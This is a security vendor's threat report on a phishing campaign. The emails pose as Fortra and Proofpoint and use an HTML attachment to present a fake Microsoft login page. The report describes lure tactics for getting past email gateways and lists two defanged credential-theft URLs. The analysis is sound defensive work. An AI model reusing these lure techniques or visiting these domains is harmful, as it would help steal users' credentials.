Threat Actors Impersonate Email Security Providers to Steal User Credentials

					<div>
				<div>
		<div>
							<div>
			<div>
						<p>SEGs Bypassed: Microsoft, Trend Micro, IronPort&nbsp;</p><p>By Shirish Lavania, Cofense Phishing Defense Center&nbsp;</p><p>In today’s world, each and every organization use email security to secure their infrastructure as email is a common entry point for attackers used for spreading phishing attacks, malwares and other types of threats. To this end, adversaries are continuously trying to bypass secure email gateways to carry out their attacks. Threat actors often disguise harmful URLs within HTML attachments, which makes it more challenging for Secure Email gateways (SEGs) to block them. The Phishing Defence Centre (PDC) analysed a phishing campaign impersonating email security provider to lure recipients into providing their user credentials via malicious HTML attachment.&nbsp;&nbsp;</p><p><img alt=" Figure 1: Email Body" height="918" src="https://cofense.com/wp-content/uploads/2023/05/Figure-1.jpg" width="1920" /></p><p><em> Figure 1: Email Body</em></p><p>Figure 1 shows the user received an email from Forta, which is likely a misspelling of Fortra. The subject mentions an “essential encrypted company email” and a fake green banner states that the “sender is verified”, in an attempt from the sender to trick the user to click on the attachment. The email instructs the user authenticate with credentials in order to view the secure attached document.&nbsp;&nbsp;</p><p><img alt="Figure 2: HTML File" height="262" src="https://cofense.com/wp-content/uploads/2023/05/Figure-2.png" width="980" /></p><p><em>Figure 2: HTML File</em></p><p>The attachment in the email shows that the adversaries wanted to make it look legitimate by naming the html as “Secure_FortraATT_2736614.html” which is inside the “Attachment.zip” folder as seen in figure 2.&nbsp;</p><p><img alt="Threat Actors Impersonate Email Security Providers to Steal User Credentials" height="1042" src="https://cofense.com/wp-content/uploads/2023/05/Featured-Image-3.jpg" width="1920" /></p><p><em>Figure 3: Email Body</em></p><p>In Figure 3 we see a similarly styled email that shows Fortra as the sender but makes mention of Proofpoint. The attacker tried to create a false sense of security to convince the user by including the footer “Secured by Proofpoint encryption”.&nbsp;<br />It is not uncommon for threat actors to use impersonation tactics in order to trick users into believing that an email is genuine.&nbsp;</p><p>Once the user clicks on the attachment, it presents a spoofed Microsoft login page with a Microsoft logo on it to make it more familiar to the user as seen in figure 4.&nbsp;&nbsp;</p><p><img alt="Figure 4: Fake Microsoft Landing Page" height="1442" src="https://cofense.com/wp-content/uploads/2023/05/Figure-4.png" width="1096" /></p><p><em>Figure 4: Fake Microsoft Landing Page</em></p><p>In figure 5, the threat actor styled the spoofed page as if it was a production login page.&nbsp;</p><p><img alt="Figure 5: Fake Production Login Page" height="656" src="https://cofense.com/wp-content/uploads/2023/05/Figure-5.png" width="1384" /></p><p><em>Figure 5: Fake Production Login Page</em></p><p>Once the users login, the credentials are exfiltrated to the malicious URLs hxxps://office[.]topexecs[.]info/ for figure 4 and hxxps//library-query[.]info/login[.]php for figure 5.&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</p><p>This campaign unveils that the attackers are constantly improving their techniques to lure users and bypass security measures in order to steal useful information. Unfortunately, security solutions such as SEGs may not always be effective in stopping attachment threats and users end up opening them. An attentive user with the help of Cofense Reporter alerted us about this campaign upon realizing that this phishing email is asking for sensitive information.&nbsp;</p>						</div>
			</div>
				</div>
	</div>
						</div>
	
			
					<div>
				<div>
		<div>
							<div>
			<div>
		<div>